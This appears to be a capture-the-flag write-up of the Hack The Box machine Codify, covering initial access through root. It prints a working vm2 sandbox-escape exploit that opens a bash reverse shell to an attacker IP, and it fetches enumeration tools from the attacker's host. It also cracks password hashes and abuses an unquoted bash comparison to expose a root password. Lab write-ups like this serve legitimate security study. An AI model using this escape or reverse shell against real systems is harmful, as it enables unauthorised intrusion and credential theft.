Open roaris opened 2 months ago
Accessing http://10.10.11.239 redirects to http://codify.htb, so add the following to /etc/hosts:
10.10.11.239 codify.htb
http://codify.htb and http://10.10.11.239:3000 look like the same page at a glance.
It seems to be an application that lets you run Node.js in the browser. As the description says, child_process and fs cannot be require'd.
The Server header in the response is Apache/2.4.52 (Ubuntu) and the X-Powered-By header is Express. I checked exploit-db and searched Google, but Apache 2.4.52 does not seem to have any serious vulnerabilities.
The page contained the following text:
The vm2 library is a widely used and trusted tool for sandboxing JavaScript. It adds an extra layer of security to prevent potentially harmful code from causing harm to your system. We take the security and reliability of our platform seriously, and we use vm2 to ensure a safe testing environment for your code.
The text contained a link, https://github.com/patriksimek/vm2/releases/tag/3.9.16, so vm2 v3.9.16 is in use.
I found CVE-2023-30547, which affects <=3.9.16.
A PoC is posted at https://gist.github.com/leesh3288/381b230b04936dd4d74aaf90cc8bb244
I have no idea why it works, but running the following code got me a reverse shell.
err = {};
const handler = {
    getPrototypeOf(target) {
        (function stack() {
            new Error().stack;
            stack();
        })();
    }
};
const proxiedErr = new Proxy(err, handler);
try {
    throw proxiedErr;
} catch ({constructor: c}) {
    c.constructor('return process')().mainModule.require('child_process').execSync('bash -c "bash -i >& /dev/tcp/10.10.14.42/4444 0>&1"');
}
$ nc -lvp 4444
listening on [any] 4444 ...
connect to [10.10.14.42] from codify.htb [10.10.11.239] 54100
bash: cannot set terminal process group (1271): Inappropriate ioctl for device
bash: no job control in this shell
svc@codify:~$
I couldn't get into /home/joshua.
svc@codify:/home$ ls
ls
joshua
svc
svc@codify:/home$ ls svc
ls svc
svc@codify:/home$ ls joshua
ls joshua
ls: cannot open directory 'joshua': Permission denied
sudo -l also says a password is required.
svc@codify:/home$ sudo -l
sudo -l
sudo: a terminal is required to read the password; either use the -S option to read from standard input or configure an askpass helper
sudo: a password is required
.pm2 looked suspicious, so I looked into it, but I didn't find anything. pm2 seems to be a process manager for Node.js: https://qiita.com/ikemura23/items/b3481393d4edca2d5188
svc@codify:~$ ls -al
ls -al
total 32
drwxr-x--- 4 svc svc 4096 Sep 26 2023 .
drwxr-xr-x 4 joshua joshua 4096 Sep 12 2023 ..
lrwxrwxrwx 1 svc svc 9 Sep 14 2023 .bash_history -> /dev/null
-rw-r--r-- 1 svc svc 220 Sep 12 2023 .bash_logout
-rw-r--r-- 1 svc svc 3771 Sep 12 2023 .bashrc
drwx------ 2 svc svc 4096 Sep 12 2023 .cache
drwxrwxr-x 5 svc svc 4096 May 9 23:42 .pm2
-rw-r--r-- 1 svc svc 807 Sep 12 2023 .profile
-rw-r--r-- 1 svc svc 39 Sep 26 2023 .vimrc
svc@codify:~$ ls -al .pm2
ls -al .pm2
total 264
drwxrwxr-x 5 svc svc 4096 May 9 23:42 .
drwxr-x--- 4 svc svc 4096 Sep 26 2023 ..
-rw-rw-r-- 1 svc svc 70370 Sep 12 2023 dump.pm2
-rw-rw-r-- 1 svc svc 84868 Sep 12 2023 dump.pm2.bak
drwxrwxr-x 2 svc svc 4096 Sep 12 2023 logs
-rw-rw-r-- 1 svc svc 2 Sep 12 2023 module_conf.json
drwxrwxr-x 2 svc svc 4096 Sep 12 2023 modules
drwxrwxr-x 2 svc svc 4096 May 9 23:42 pids
-rw-rw-r-- 1 svc svc 72034 May 9 23:42 pm2.log
-rw-r--r-- 1 svc svc 4 May 9 23:42 pm2.pid
srwxrwxr-x 1 svc svc 0 May 9 23:42 pub.sock
srwxrwxr-x 1 svc svc 0 May 9 23:42 rpc.sock
-rw-rw-r-- 1 svc svc 13 Sep 12 2023 touch
dump.pm2 and dump.pm2.bak were text files. I ran python3 -m http.server on the machine and pulled them to my local box to check, but svc's and joshua's passwords don't seem to be in them.
svc@codify:~$ pm2 --version
pm2 --version
5.3.0
Searching for "pm2 5.3 exploit" turns up the vulnerability in vm2 that pm2 depends on, but pm2 itself doesn't seem to have a vulnerability.
I was stuck, so Guided Mode.
Task1 : Which is the highest open TCP port on Codify? A : 3000
Task2 : What is the relative path on the web application that offers a form to run JavaScript code? A : /editor
Task3 : What is the name of the sandboxing library used by the application? A : vm2
Task4 : What is the 2023 CVE ID assigned to a remote code execution vulnerability in vm2 that was patched in version 3.9.17? A : CVE-2023-30547
Task5: What user is the web application running as? A : svc
Task6: There is a second NodeJS application on Codify that isn't running. What is the name of the SQLite database file used by this application? Hint : Now that you have a foothold on the machine, enumerate the web directories.
Where am I supposed to look?
https://qiita.com/schectman-hell/items/6ac2b5dd396f12cfe874 says to use linpeas. I couldn't pull it onto the machine directly from GitHub, so I ran python -m http.server locally and fetched it from my local box.
svc@codify:~$ wget https://github.com/peass-ng/PEASS-ng/releases/download/20240505-284a0ce8/linpeas.sh
wget https://github.com/peass-ng/PEASS-ng/releases/download/20240505-284a0ce8/linpeas.sh
--2024-05-10 14:36:21-- https://github.com/peass-ng/PEASS-ng/releases/download/20240505-284a0ce8/linpeas.sh
Resolving github.com (github.com)... failed: Temporary failure in name resolution.
wget: unable to resolve host address ‘github.com’
svc@codify:~$ wget http://10.10.14.42:8000/linpeas.sh
wget http://10.10.14.42:8000/linpeas.sh
--2024-05-10 14:38:01-- http://10.10.14.42:8000/linpeas.sh
Connecting to 10.10.14.42:8000... connected.
HTTP request sent, awaiting response... 200 OK
Length: 860337 (840K) [text/x-sh]
Saving to: ‘linpeas.sh’
2024-05-10 14:38:02 (801 KB/s) - ‘linpeas.sh’ saved [860337/860337]
svc@codify:~$ chmod +x linpeas.sh
chmod +x linpeas.sh
There's too much output and I don't know where to focus.
There is indeed a SQLite file in there, but focusing on it straight away is a stretch...
╔══════════╣ Searching tables inside readable .db/.sql/.sqlite files (limit 100)
Found /var/lib/command-not-found/commands.db: SQLite 3.x database, last written using SQLite version 3037002, file counter 5, database pages 836, cookie 0x4, schema 4, UTF-8, version-valid-for 5
Found /var/lib/fwupd/pending.db: SQLite 3.x database, last written using SQLite version 3037002, file counter 3, database pages 6, cookie 0x5, schema 4, UTF-8, version-valid-for 3
Found /var/lib/PackageKit/transactions.db: SQLite 3.x database, last written using SQLite version 3037002, file counter 5, database pages 8, cookie 0x4, schema 4, UTF-8, version-valid-for 5
Found /var/lib/plocate/plocate.db: regular file, no read permission
Found /var/www/contact/tickets.db: SQLite 3.x database, last written using SQLite version 3037002, file counter 17, database pages 5, cookie 0x2, schema 4, UTF-8, version-valid-for 17
-> Extracting tables from /var/lib/command-not-found/commands.db (limit 20)
-> Extracting tables from /var/lib/fwupd/pending.db (limit 20)
-> Extracting tables from /var/lib/PackageKit/transactions.db (limit 20)
-> Extracting tables from /var/www/contact/tickets.db (limit 20)
https://0xdf.gitlab.io/2024/04/06/htb-codify.html looks at /var/www. So if you look at /var/www, you arrive at the idea of focusing on /var/www/contact/tickets.db.
svc@codify:~$ ls -al /var/www
ls -al /var/www
total 20
drwxr-xr-x 5 root root 4096 Sep 12 2023 .
drwxr-xr-x 13 root root 4096 Oct 31 2023 ..
drwxr-xr-x 3 svc svc 4096 Sep 12 2023 contact
drwxr-xr-x 4 svc svc 4096 Sep 12 2023 editor
drwxr-xr-x 2 svc svc 4096 Apr 12 2023 html
svc@codify:~$ ls -al /var/www/html
ls -al /var/www/html
total 20
drwxr-xr-x 2 svc svc 4096 Apr 12 2023 .
drwxr-xr-x 5 root root 4096 Sep 12 2023 ..
-rw-r--r-- 1 svc svc 10671 Apr 12 2023 index.html
svc@codify:~$ ls -al /var/www/editor
ls -al /var/www/editor
total 64
drwxr-xr-x 4 svc svc 4096 Sep 12 2023 .
drwxr-xr-x 5 root root 4096 Sep 12 2023 ..
-rw-r--r-- 1 svc svc 1461 Sep 12 2023 index.js
drwxr-xr-x 92 svc svc 4096 Sep 12 2023 node_modules
-rw-r--r-- 1 svc svc 268 Apr 13 2023 package.json
-rw-r--r-- 1 svc svc 37562 Sep 12 2023 package-lock.json
drwxr-xr-x 2 svc svc 4096 Sep 12 2023 templates
Task6: There is a second NodeJS application on Codify that isn't running. What is the name of the SQLite database file used by this application? Hint : Now that you have a foothold on the machine, enumerate the web directories. A : tickets.db
Checking with DB Browser for SQLite revealed joshua's hashed password. bcrypt is used.
The sqlite3 command would have worked too.
joshua@codify:~$ sqlite3 --version
3.37.2 2022-01-06 13:25:41 872ba256cbf61d9290b571c0e6d82a20c224ca3ad82971edc46b29818d5dalt1
joshua@codify:~$ sqlite3 /var/www/contact/tickets.db
SQLite version 3.37.2 2022-01-06 13:25:41
Enter ".help" for usage hints.
sqlite> .tables
tickets users
sqlite> select * from users;
3|joshua|$2a$12$SOn8Pf6z8fO/nVsNbAAequ/P6vLRJJl7gCUEiYBU2iLHn4G/p/Zw2
Recover the original password with John the Ripper.
$ john hash.txt --wordlist=/usr/share/wordlists/rockyou.txt
Using default input encoding: UTF-8
Loaded 1 password hash (bcrypt [Blowfish 32/64 X3])
Cost 1 (iteration count) is 4096 for all loaded hashes
Will run 16 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
spongebob1 (?)
1g 0:00:00:17 DONE (2024-05-11 00:11) 0.05571g/s 80.22p/s 80.22c/s 80.22C/s winston..michel
Use the "--show" option to display all of the cracked passwords reliably
Session completed.
Using this password, switch to joshua with su and get user.txt.
svc@codify:~$ su joshua
su joshua
Password: spongebob1
bash -i
bash: cannot set terminal process group (1271): Inappropriate ioctl for device
bash: no job control in this shell
joshua@codify:/home/svc$ cd ~
cd ~
joshua@codify:~$ cat user.txt
cat user.txt
8a5b86ae70d18ae2b5c589c758526946
Running sudo -l shows that /opt/scripts/mysql-backup.sh can be run as root.
joshua@codify:~$ sudo -l
sudo -l
sudo: a terminal is required to read the password; either use the -S option to read from standard input or configure an askpass helper
sudo: a password is required
joshua@codify:~$ sudo -l -S
sudo -l -S
[sudo] password for joshua: spongebob1
Matching Defaults entries for joshua on codify:
env_reset, mail_badpass,
secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin,
use_pty
User joshua may run the following commands on codify:
(root) /opt/scripts/mysql-backup.sh
joshua@codify:~$ cat /opt/scripts/mysql-backup.sh
cat /opt/scripts/mysql-backup.sh
#!/bin/bash

DB_USER="root"
DB_PASS=$(/usr/bin/cat /root/.creds)
BACKUP_DIR="/var/backups/mysql"

read -s -p "Enter MySQL password for $DB_USER: " USER_PASS
/usr/bin/echo

if [[ $DB_PASS == $USER_PASS ]]; then
    /usr/bin/echo "Password confirmed!"
else
    /usr/bin/echo "Password confirmation failed!"
    exit 1
fi

/usr/bin/mkdir -p "$BACKUP_DIR"

databases=$(/usr/bin/mysql -u "$DB_USER" -h 0.0.0.0 -P 3306 -p"$DB_PASS" -e "SHOW DATABASES;" | /usr/bin/grep -Ev "(Database|information_schema|performance_schema)")

for db in $databases; do
    /usr/bin/echo "Backing up database: $db"
    /usr/bin/mysqldump --force -u "$DB_USER" -h 0.0.0.0 -P 3306 -p"$DB_PASS" "$db" | /usr/bin/gzip > "$BACKUP_DIR/$db.sql.gz"
done

/usr/bin/echo "All databases backed up successfully!"

/usr/bin/echo "Changing the permissions"
/usr/bin/chown root:sys-adm "$BACKUP_DIR"
/usr/bin/chmod 774 -R "$BACKUP_DIR"
/usr/bin/echo 'Done!'
It can't be modified.
joshua@codify:~$ ls -l /opt/scripts/mysql-backup.sh
ls -l /opt/scripts/mysql-backup.sh
-rwxr-xr-x 1 root root 928 Nov 2 2023 /opt/scripts/mysql-backup.sh
I could access MySQL with joshua / spongebob1.
joshua@codify:~$ mysql -ujoshua -h 0.0.0.0 -P 3306 -p
Enter password:
Welcome to the MySQL monitor. Commands end with ; or \g.
Your MySQL connection id is 8
Server version: 5.5.5-10.10.3-MariaDB-1:10.10.3+maria~ubu2204 mariadb.org binary distribution
Copyright (c) 2000, 2023, Oracle and/or its affiliates.
Oracle is a registered trademark of Oracle Corporation and/or its
affiliates. Other names may be trademarks of their respective
owners.
Type 'help;' or '\h' for help. Type '\c' to clear the current input statement.
mysql> show databases;
+--------------------+
| Database |
+--------------------+
| information_schema |
| mysql |
| performance_schema |
| sys |
+--------------------+
4 rows in set (0.00 sec)
The hashed passwords are stored in mysql.user.
mysql> use mysql;
Reading table information for completion of table and column names
You can turn off this feature to get a quicker startup with -A
Database changed
mysql> select * from user;
+-----------+-------------+-------------------------------------------+-------------+-------------+-------------+-------------+-------------+-----------+-------------+---------------+--------------+-----------+------------+-----------------+------------+------------+--------------+------------+-----------------------+------------------+--------------+-----------------+------------------+------------------+----------------+---------------------+--------------------+------------------+------------+--------------+------------------------+---------------------+----------+------------+-------------+--------------+---------------+-------------+-----------------+----------------------+-----------------------+-------------------------------------------+------------------+---------+--------------+--------------------+
| Host | User | Password | Select_priv | Insert_priv | Update_priv | Delete_priv | Create_priv | Drop_priv | Reload_priv | Shutdown_priv | Process_priv | File_priv | Grant_priv | References_priv | Index_priv | Alter_priv | Show_db_priv | Super_priv | Create_tmp_table_priv | Lock_tables_priv | Execute_priv | Repl_slave_priv | Repl_client_priv | Create_view_priv | Show_view_priv | Create_routine_priv | Alter_routine_priv | Create_user_priv | Event_priv | Trigger_priv | Create_tablespace_priv | Delete_history_priv | ssl_type | ssl_cipher | x509_issuer | x509_subject | max_questions | max_updates | max_connections | max_user_connections | plugin | authentication_string | password_expired | is_role | default_role | max_statement_time |
+-----------+-------------+-------------------------------------------+-------------+-------------+-------------+-------------+-------------+-----------+-------------+---------------+--------------+-----------+------------+-----------------+------------+------------+--------------+------------+-----------------------+------------------+--------------+-----------------+------------------+------------------+----------------+---------------------+--------------------+------------------+------------+--------------+------------------------+---------------------+----------+------------+-------------+--------------+---------------+-------------+-----------------+----------------------+-----------------------+-------------------------------------------+------------------+---------+--------------+--------------------+
| localhost | mariadb.sys | | N | N | N | N | N | N | N | N | N | N | N | N | N | N | N | N | N | N | N | N | N | N | N | N | N | N | N | N | N | N | | | | | 0 | 0 | 0 | 0 | mysql_native_password | | Y | N | | 0.000000 |
| localhost | root | *4ECCEBD05161B6782081E970D9D2C72138197218 | Y | Y | Y | Y | Y | Y | Y | Y | Y | Y | Y | Y | Y | Y | Y | Y | Y | Y | Y | Y | Y | Y | Y | Y | Y | Y | Y | Y | Y | Y | | | | | 0 | 0 | 0 | 0 | mysql_native_password | *4ECCEBD05161B6782081E970D9D2C72138197218 | N | N | | 0.000000 |
| 127.0.0.1 | root | *4ECCEBD05161B6782081E970D9D2C72138197218 | Y | Y | Y | Y | Y | Y | Y | Y | Y | Y | Y | Y | Y | Y | Y | Y | Y | Y | Y | Y | Y | Y | Y | Y | Y | Y | Y | Y | Y | Y | | | | | 0 | 0 | 0 | 0 | mysql_native_password | *4ECCEBD05161B6782081E970D9D2C72138197218 | N | N | | 0.000000 |
| % | passbolt | *63DA7233CC5151B814CBEC5AF8B3EAC43347A203 | N | N | N | N | N | N | N | N | N | N | N | N | N | N | N | N | N | N | N | N | N | N | N | N | N | N | N | N | N | N | | | | | 0 | 0 | 0 | 0 | mysql_native_password | *63DA7233CC5151B814CBEC5AF8B3EAC43347A203 | N | N | | 0.000000 |
| % | joshua | *323A5EDCBFA127CC75F6C155457533AC1D5C4921 | Y | Y | Y | Y | Y | Y | Y | Y | Y | Y | N | Y | Y | Y | Y | Y | Y | Y | Y | Y | Y | Y | Y | Y | Y | Y | Y | Y | Y | Y | | | | | 0 | 0 | 0 | 0 | mysql_native_password | *323A5EDCBFA127CC75F6C155457533AC1D5C4921 | N | N | | 0.000000 |
| % | root | *4ECCEBD05161B6782081E970D9D2C72138197218 | Y | Y | Y | Y | Y | Y | Y | Y | Y | Y | Y | Y | Y | Y | Y | Y | Y | Y | Y | Y | Y | Y | Y | Y | Y | Y | Y | Y | Y | Y | | | | | 0 | 0 | 0 | 0 | mysql_native_password | *4ECCEBD05161B6782081E970D9D2C72138197218 | N | N | | 0.000000 |
+-----------+-------------+-------------------------------------------+-------------+-------------+-------------+-------------+-------------+-----------+-------------+---------------+--------------+-----------+------------+-----------------+------------+------------+--------------+------------+-----------------------+------------------+--------------+-----------------+------------------+------------------+----------------+---------------------+--------------------+------------------+------------+--------------+------------------------+---------------------+----------+------------+-------------+--------------+---------------+-------------+-----------------+----------------------+-----------------------+-------------------------------------------+------------------+---------+--------------+--------------------+
6 rows in set (0.00 sec)
Giving 323A5EDCBFA127CC75F6C155457533AC1D5C4921 to John the Ripper produced the original password, but giving it 4ECCEBD05161B6782081E970D9D2C72138197218 didn't work.
$ john hash.txt --wordlist=/usr/share/wordlists/rockyou.txt
Using default input encoding: UTF-8
Loaded 1 password hash (mysql-sha1, MySQL 4.1+ [SHA1 256/256 AVX2 8x])
Warning: no OpenMP support for this hash type, consider --fork=16
Press 'q' or Ctrl-C to abort, almost any other key for status
spongebob1 (?)
1g 0:00:00:00 DONE (2024-05-11 00:39) 3.846g/s 5200p/s 5200c/s 5200C/s teacher..special
Use the "--show" option to display all of the cracked passwords reliably
Session completed.
$ john hash.txt --wordlist=/usr/share/wordlists/rockyou.txt
Using default input encoding: UTF-8
Loaded 1 password hash (mysql-sha1, MySQL 4.1+ [SHA1 256/256 AVX2 8x])
Warning: no OpenMP support for this hash type, consider --fork=16
Press 'q' or Ctrl-C to abort, almost any other key for status
0g 0:00:00:01 DONE (2024-05-11 00:40) 0g/s 10317Kp/s 10317Kc/s 10317KC/sa6_123..*7¡Vamos!
Session completed.
I have no idea how to escalate privileges with /opt/scripts/mysql-backup.sh. Stuck again, so Guided Mode.
Task9 : What is the full path of the script that the joshua user can run as root? A : /opt/scripts/mysql-backup.sh
Task10 : Which single character is accepted as the password, bypassing the password check in the script? Hint : When the right-hand side of an equals operation inside double brackets is not quoted, it is evaluated as a pattern instead of a string.
What does that mean?
https://0xdf.gitlab.io/2024/04/06/htb-codify.html#vulnerabilities
if [[ $DB_PASS == $USER_PASS ]]; then
is apparently the problem.
https://mywiki.wooledge.org/BashPitfalls?source=post_page-----933488bfbfff--------------------------------#A.5B_.24foo_.3D_.22bar.22_.5D
I barely understand it, but apparently the correct form is: if [[ $DB_PASS == "$USER_PASS" ]]; then
Without that, the check can apparently be bypassed when $USER_PASS is *.
A : *
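An added example (not from this write-up or from the box's script) that puts the script's unquoted comparison next to the quoted form and the POSIX [ ] form; SECRET is a constructed placeholder, not the real /root/.creds value.

```shell
#!/bin/sh
# Added example, not from the write-up: the script's check
#   if [[ $DB_PASS == $USER_PASS ]]; then
# treats an unquoted right-hand side as a glob pattern, so a guess of "*"
# (or a prefix glob such as "c*") matches any stored value. Quoting the
# right-hand side, or using POSIX [ ] with both sides quoted, compares
# literal strings. SECRET is a constructed placeholder, not the machine's
# real /root/.creds value.
SECRET='correct-horse-battery'

# Vulnerable form (as in mysql-backup.sh): $2 is unquoted inside [[ ]],
# so bash interprets it as a pattern. Run via bash -c because [[ ]] is a
# bash construct and this file may be executed by plain sh.
check_unquoted() {                       # $1 = user-supplied guess
    bash -c '[[ $1 == $2 ]]' bash "$SECRET" "$1"
}

# Hardened form: quoting the right-hand side disables pattern matching.
check_quoted() {
    bash -c '[[ $1 == "$2" ]]' bash "$SECRET" "$1"
}

# Equivalent POSIX form: [ ] never globs, and quoting both sides keeps
# empty or space-containing values from breaking the test.
check_posix() {
    [ "$SECRET" = "$1" ]
}

# Print a comparison table so the difference is visible when run directly.
demo() {
    for guess in "$SECRET" 'wrong' '*' 'c*' ''; do
        printf '%-24s unquoted=%s quoted=%s posix=%s\n' "'$guess'" \
            "$(check_unquoted "$guess" && echo PASS || echo deny)" \
            "$(check_quoted   "$guess" && echo PASS || echo deny)" \
            "$(check_posix    "$guess" && echo PASS || echo deny)"
    done
}

demo
```

Only the unquoted column accepts '*' and 'c*'; the two quoted forms accept nothing but the exact secret.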
Task11 : What is the root user's MySQL password? Hint : The bash script executes the mysqldump command, transmitting the root user's password via the command line. Using a process snooper like pspy, you will be able to see the command being executed and read the password.
/usr/bin/mysqldump --force -u "$DB_USER" -h 0.0.0.0 -P 3306 -p"$DB_PASS" "$db" | /usr/bin/gzip > "$BACKUP_DIR/$db.sql.gz"
As shown here, passing the password on the command line is the problem.
Apparently you use something called pspy.
Run python -m http.server locally and fetch it from the local box.
joshua@codify:~$ wget http://10.10.14.42:8000/pspy64
--2024-05-10 16:30:55-- http://10.10.14.42:8000/pspy64
Connecting to 10.10.14.42:8000... connected.
HTTP request sent, awaiting response... 200 OK
Length: 3104768 (3.0M) [application/octet-stream]
Saving to: ‘pspy64’
pspy64 100%[===================>] 2.96M 1.11MB/s in 2.7s
2024-05-10 16:30:58 (1.11 MB/s) - ‘pspy64’ saved [3104768/3104768]
joshua@codify:~$ chmod +x pspy64
With ./pspy64 running, I ran sudo /opt/scripts/mysql-backup.sh and entered *, and DB_PASS showed up as below.
2024/05/10 16:35:01 CMD: UID=0 PID=41773 | sudo /opt/scripts/mysql-backup.sh
2024/05/10 16:35:01 CMD: UID=0 PID=41774 |
2024/05/10 16:35:04 CMD: UID=0 PID=41775 | /usr/bin/echo
2024/05/10 16:35:04 CMD: UID=0 PID=41776 | /usr/bin/echo Password confirmed!
2024/05/10 16:35:04 CMD: UID=0 PID=41777 | /bin/bash /opt/scripts/mysql-backup.sh
2024/05/10 16:35:04 CMD: UID=0 PID=41778 | /bin/bash /opt/scripts/mysql-backup.sh
2024/05/10 16:35:04 CMD: UID=0 PID=41780 | /usr/bin/grep -Ev (Database|information_schema|performance_schema)
2024/05/10 16:35:04 CMD: UID=0 PID=41779 | /bin/bash /opt/scripts/mysql-backup.sh
2024/05/10 16:35:04 CMD: UID=0 PID=41781 | /bin/bash /opt/scripts/mysql-backup.sh
2024/05/10 16:35:04 CMD: UID=0 PID=41783 | /bin/bash /opt/scripts/mysql-backup.sh
2024/05/10 16:35:04 CMD: UID=0 PID=41782 |
2024/05/10 16:35:04 CMD: UID=0 PID=41784 | /usr/bin/echo Backing up database: sys
2024/05/10 16:35:04 CMD: UID=0 PID=41786 | /bin/bash /opt/scripts/mysql-backup.sh
2024/05/10 16:35:04 CMD: UID=0 PID=41785 | /usr/bin/mysqldump --force -u root -h 0.0.0.0 -P 3306 -pkljh12k3jhaskjh12kjh3 sys
2024/05/10 16:35:05 CMD: UID=0 PID=41787 | /bin/bash /opt/scripts/mysql-backup.sh
2024/05/10 16:35:05 CMD: UID=0 PID=41788 |
2024/05/10 16:35:05 CMD: UID=0 PID=41789 | /usr/bin/chown root:sys-adm /var/backups/mysql
2024/05/10 16:35:05 CMD: UID=0 PID=41790 |
2024/05/10 16:35:05 CMD: UID=0 PID=41791 | /usr/bin/echo Done!
Task11 : What is the root user's MySQL password? Hint : The bash script executes the mysqldump command, transmitting the root user's password via the command line. Using a process snooper like pspy, you will be able to see the command being executed and read the password. A : kljh12k3jhaskjh12kjh3
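An added example (not from this write-up or the box's script) of the fix for the password-in-argv problem above: the MySQL client programs read credentials from an option file passed with --defaults-extra-file, which is a real client option; the paths and password here are constructed placeholders.

```shell
#!/bin/sh
# Added example, not from the write-up: mysql-backup.sh runs
#   mysqldump ... -p"$DB_PASS" ...
# so the root password sits in the argv of the mysqldump process, which any
# local user can read (pspy, ps, /proc/PID/cmdline). The MySQL/MariaDB client
# programs accept a [client] option file instead, passed as the first
# argument with --defaults-extra-file. Paths and the password below are
# constructed placeholders.

# Write a [client] option file that only its owner can read. umask is set in
# a subshell so the caller's umask is left untouched. Prints the path.
write_mysql_defaults() {          # $1 = user, $2 = password, $3 = path
    ( umask 077
      printf '[client]\nuser=%s\npassword=%s\n' "$1" "$2" > "$3" ) || return 1
    chmod 600 "$3"
    printf '%s\n' "$3"
}

# Check a reviewer would want before trusting such a file: mode must be 0600.
# (GNU stat -c on Linux, BSD stat -f on macOS.)
defaults_file_is_private() {
    mode=$(stat -c %a "$1" 2>/dev/null || stat -f %Lp "$1" 2>/dev/null)
    [ "$mode" = "600" ]
}

# Build the mysqldump command line the safe way: the password never appears
# in argv. mysqldump is not executed here; the function only returns the
# command string so it can be inspected.
safe_dump_cmd() {                 # $1 = defaults file, $2 = database name
    printf '/usr/bin/mysqldump --defaults-extra-file=%s --force -h 0.0.0.0 -P 3306 %s\n' "$1" "$2"
}

# Walk through it once with placeholder values.
cnf="${TMPDIR:-/tmp}/mysql-backup-demo.$$.cnf"
write_mysql_defaults root 'PLACEHOLDER_PASSWORD' "$cnf" >/dev/null
defaults_file_is_private "$cnf" && echo "option file is mode 0600"
safe_dump_cmd "$cnf" sys          # the password is not in this line
rm -f "$cnf"
```

Running pspy against such a backup would only show the option-file path, not the password.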
Switch to root with the obtained password and get root.txt.
joshua@codify:~$ su
Password:
root@codify:/home/joshua# cd /root
root@codify:~# cat root.txt
ad143b379fa805c854a040b8696fc2ce
Solution summary
https://qiita.com/schectman-hell/items/6ac2b5dd396f12cfe874 notes that the root password could also have been recovered by identifying it one character at a time from the front (similar to extracting a password via blind SQL injection).
https://app.hackthebox.com/machines/Codify